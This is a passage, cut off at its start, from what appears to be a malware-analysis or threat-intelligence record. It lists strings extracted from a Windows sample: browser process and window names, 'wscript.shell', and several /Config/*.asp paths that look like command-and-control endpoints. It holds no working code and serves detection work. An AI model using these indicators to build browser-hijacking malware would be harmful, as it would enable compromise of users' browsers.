Files%\Internet Explorer\iexplore.exe</pre><pre>/Config/KeyStringmicrOLAbPop.asp?p=</pre><pre>wscript.shell</pre><pre>/Config/GolbalString.asp?p=</pre><pre>/Config/TransSiteString_Commit.asp?site=</pre><pre>/Config/FindBrowserCode.asp?p=</pre><pre>iexplorer.exe</pre><pre>PORTUGAL</pre><pre>from portugal</pre><pre>to portugal</pre><pre>opera</pre><pre>Error opening key.</pre><pre>firefox</pre><pre>chrome</pre><pre>mozilla</pre><pre>Chrome_OmniboxView</pre><pre>netpia.com</pre><pre>WinCtrProc.exe</pre></rdf:Description>